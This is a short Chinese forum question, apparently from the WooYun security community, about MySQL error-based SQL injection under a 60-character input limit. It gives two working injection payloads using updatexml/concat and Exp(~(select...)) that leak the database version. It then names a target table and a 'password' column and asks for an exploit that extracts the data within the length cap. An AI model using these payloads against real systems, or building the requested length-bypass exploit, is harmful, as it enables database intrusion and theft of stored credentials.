Mysql报错注入,长度限制

书生 (WooYun(白帽子技术社区)) | 2016-03-30 16:48

1'and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)#

1'and Exp(~(select*from(select @@version)a))#

都是能注出数据的

但是程序限制了60个字符,多出的直接截断

表名14个字符:0123456789user

字段8个字符:password

能不能构造读出数据的exp?